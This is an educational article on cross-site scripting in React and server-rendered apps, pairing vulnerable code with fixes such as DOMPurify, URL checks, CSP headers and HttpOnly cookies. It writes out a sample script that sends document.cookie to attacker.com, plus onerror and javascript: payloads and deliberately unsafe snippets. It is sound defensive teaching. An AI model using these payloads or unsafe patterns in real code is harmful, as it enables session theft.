TL;DR: XSS (Cross-Site Scripting) happens when malicious JavaScript gets injected into a webpage and executes in other users' browsers. It can steal session tokens, hijack accounts, and redirect users. React prevents most XSS by escaping content automatically — but dangerouslySetInnerHTML, unvalidated URL parameters, and raw DOM manipulation break that protection. These patterns appear frequently in AI-generated code.
Why AI Coders Need to Know This
XSS is ranked #2 in OWASP's Top 10 web vulnerabilities. According to HackerOne's 2025 bug bounty report, XSS accounted for 23% of all reported vulnerabilities — more than any other category. It is the most common vulnerability found in web applications that accept user input.
For vibe coders, XSS is especially relevant because:
- Any app that displays user-generated content — comments, usernames, search queries, profile bios — is a potential XSS target
- AI tools generate
dangerouslySetInnerHTMLfor rich text features without always warning you about the implications - Templates and string interpolation in server-rendered pages are common XSS sources in AI-generated backend code
- The attack is invisible to the victim — they load a normal-looking page and their session is already compromised
The good news: React's default rendering protects you from the most common XSS patterns automatically. The bad news: there are specific anti-patterns AI produces that bypass that protection completely.
How XSS Works
XSS exploits a simple fact: browsers cannot distinguish between "this JavaScript is part of the application" and "this JavaScript came from user input." If user-provided text ends up in a page as executable HTML, the browser runs it.
The basic attack
Imagine a comment section. A user submits this as their comment:
<script>
document.cookie = 'stolen'; // In real attacks: sends cookies to attacker's server
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>
If the server saves this text and renders it directly into HTML without escaping it:
<!-- Vulnerable — directly injects user content as HTML -->
<div class="comment">
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
</div>
Every user who loads that page has their session cookie sent to the attacker. The attacker can then use that cookie to log in as those users — no password required.
The three types of XSS
Stored XSS
Malicious script is saved to the database (comment, profile, post). Every user who loads the page gets attacked. Most dangerous.
Reflected XSS
Payload in a URL parameter gets echoed in the response. Requires victim to click a crafted link. Common in search pages and error messages.
DOM-Based XSS
JavaScript reads from a dangerous source (like window.location.hash) and writes it to the DOM unsafely. Happens entirely in the browser with no server involvement. Common in single-page apps.
Real Scenario
You asked Cursor to add a blog with a comment system. Users can submit comments with basic formatting (bold, italic). The AI decides to use dangerouslySetInnerHTML to render the formatted text.
Prompt I Would Type
Add a comment section to my blog where:
- Users can submit comments
- Comments support basic HTML formatting (bold, italic, links)
- Comments are stored in the database and displayed to all visitors
- Make sure it is safe from XSS attacks
- Show me the vulnerable version first, then the safe version
What AI Generated
The vulnerable version (what AI often generates for "support HTML formatting"):
// ❌ VULNERABLE — renders raw HTML from user input
function Comment({ comment }) {
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: comment.content }}
/>
);
}
// Any user can submit: <script>steal(document.cookie)</script>
// Or: <img src=x onerror="steal(document.cookie)">
The safe version using DOMPurify to sanitize HTML before rendering:
// ✅ SAFE — sanitize HTML before rendering
import DOMPurify from 'dompurify';
function Comment({ comment }) {
// DOMPurify strips all script tags, event handlers, and dangerous attributes
const safeHTML = DOMPurify.sanitize(comment.content, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'br'],
ALLOWED_ATTR: ['href'], // Only allow href on anchor tags
ALLOW_DATA_ATTR: false
});
return (
<div
className="comment-body"
dangerouslySetInnerHTML={{ __html: safeHTML }}
/>
);
}
// Install: npm install dompurify @types/dompurify
DOMPurify strips <script> tags, onerror handlers, javascript: URLs, and every other XSS vector while preserving the safe formatting tags. It is the industry standard for this use case.
Understanding Each Part
Why React is mostly safe by default
React escapes all values you embed in JSX automatically. When you write:
const userInput = '<script>alert("xss")</script>';
return <div>{userInput}</div>;
React renders this as the literal text <script>alert("xss")</script> — visible text on the page, not executable HTML. The angle brackets become < and > HTML entities. This is automatic and covers the vast majority of cases.
dangerouslySetInnerHTML — the override
The name is a warning. dangerouslySetInnerHTML explicitly bypasses React's escaping and injects raw HTML. It is necessary for legitimate use cases (rendering markdown, rich text from a CMS) but requires sanitization before use. AI reaches for it whenever a feature involves "displaying HTML content."
Other XSS bypass patterns in AI code
href attribute with user input:
// ❌ VULNERABLE — javascript: URLs execute code
const url = user.website; // User submits: javascript:steal(document.cookie)
return <a href={url}>Visit site</a>;
// ✅ SAFE — validate URL scheme
const safeUrl = url.startsWith('https://') || url.startsWith('http://')
? url : '#';
return <a href={safeUrl} rel="noopener noreferrer">Visit site</a>;
innerHTML in vanilla JavaScript:
// ❌ VULNERABLE — direct DOM manipulation with user content
document.getElementById('output').innerHTML = searchQuery;
// ✅ SAFE — use textContent for plain text
document.getElementById('output').textContent = searchQuery;
// Or sanitize if HTML is needed:
document.getElementById('output').innerHTML = DOMPurify.sanitize(searchQuery);
Server-side template injection (Express/EJS):
// ❌ VULNERABLE — unescaped variable in EJS template
<h1>Results for: <%- searchQuery %></h1>
// ^^ raw output — no escaping
// ✅ SAFE — escaped output
<h1>Results for: <%= searchQuery %></h1>
// ^^ auto-escaped
What AI Gets Wrong About XSS
Using dangerouslySetInnerHTML without sanitization
AI generates dangerouslySetInnerHTML={{ __html: userContent }} without DOMPurify. Often rationalized as "the data comes from our database" — but the data in your database came from user input at some point.
innerHTML for DOM manipulation
When AI writes vanilla JavaScript to update the DOM, it often uses .innerHTML = value. If value contains any user-influenced data, this is XSS. Use .textContent for plain text or DOMPurify for HTML.
Unvalidated redirect URLs
AI builds redirect functionality like router.push(req.query.redirect) without validating the URL. An attacker crafts ?redirect=javascript:maliciousCode().
Missing rel="noopener noreferrer" on external links
When AI renders user-submitted URLs as links, it often omits rel="noopener noreferrer". Without it, the linked page can access your page via window.opener — a related attack called reverse tabnapping.
The XSS Search Pattern
Search your codebase for these strings: dangerouslySetInnerHTML, .innerHTML =, document.write(, eval(, javascript:. Every match needs review. If any of them use user-provided data, you have a potential XSS vulnerability.
Prevention and Defense-in-Depth
Layer 1: Output encoding (primary defense)
Always encode user data when rendering it. React does this automatically for JSX. For dangerouslySetInnerHTML use DOMPurify. For server-rendered templates use your template engine's escaping syntax.
Layer 2: Content Security Policy
Add a CSP header to restrict what JavaScript sources the browser will execute:
// Next.js — next.config.js
const securityHeaders = [
{
key: 'Content-Security-Policy',
value: [
"default-src 'self'",
"script-src 'self' 'nonce-{nonce}'", // Only scripts from your domain
"style-src 'self' 'unsafe-inline'",
"img-src 'self' data: https:",
"connect-src 'self' https://api.yourdomain.com"
].join('; ')
}
];
module.exports = { async headers() { return [{ source: '/(.*)', headers: securityHeaders }]; } };
A strict CSP means that even if an attacker injects a <script> tag, the browser refuses to execute it because it is not from an approved source.
Layer 3: HttpOnly cookies
If session cookies have the HttpOnly flag, JavaScript cannot read them. This limits XSS damage — the attacker can manipulate the page but cannot steal the session token for use elsewhere.
// Express — set HttpOnly cookies
res.cookie('sessionId', token, {
httpOnly: true, // JavaScript cannot read this cookie
secure: true, // HTTPS only
sameSite: 'strict' // CSRF protection too
});
What to Learn Next
- What Is SQL Injection? — The other major injection attack class.
- Security Basics for AI Coders — The full security picture.
- Common Security Vulnerabilities — CSRF and other attacks beyond XSS.
- What Is Authentication? — Session management and why XSS against sessions is so damaging.
Next Step
Search your project for dangerouslySetInnerHTML right now. For each one, ask: does this content ever come from user input or a database? If yes, install DOMPurify and sanitize before rendering. This 10-minute check prevents the most common XSS attack path in React apps.
FAQ
XSS (Cross-Site Scripting) is a vulnerability where an attacker injects malicious JavaScript into a webpage that other users then load. When their browser executes it, the attacker can steal session tokens, hijack accounts, redirect users, or log keystrokes — all without the victim knowing anything happened.
React escapes all values inserted into JSX by default, preventing most XSS. However, dangerouslySetInnerHTML, unvalidated href attributes with javascript: URLs, and vanilla DOM manipulation with innerHTML all bypass React's protection. These patterns appear frequently in AI-generated code.
Stored XSS saves the malicious payload in the database and attacks every user who loads the affected page. Reflected XSS puts the payload in a URL parameter; the server includes it in the response, but only affects users who click the crafted link. Stored XSS is more dangerous because it affects all visitors automatically.
A CSP is an HTTP header that tells the browser which JavaScript sources are allowed to execute. Even if an attacker successfully injects a script tag, a strict CSP prevents the browser from running it. It is a critical defense-in-depth layer that reduces XSS impact significantly.
Yes, frequently. AI tools generate dangerouslySetInnerHTML for rich text rendering, innerHTML for DOM updates, and unvalidated URL attributes — all without sanitization. Always search for these patterns in AI-generated code and verify they handle user input safely.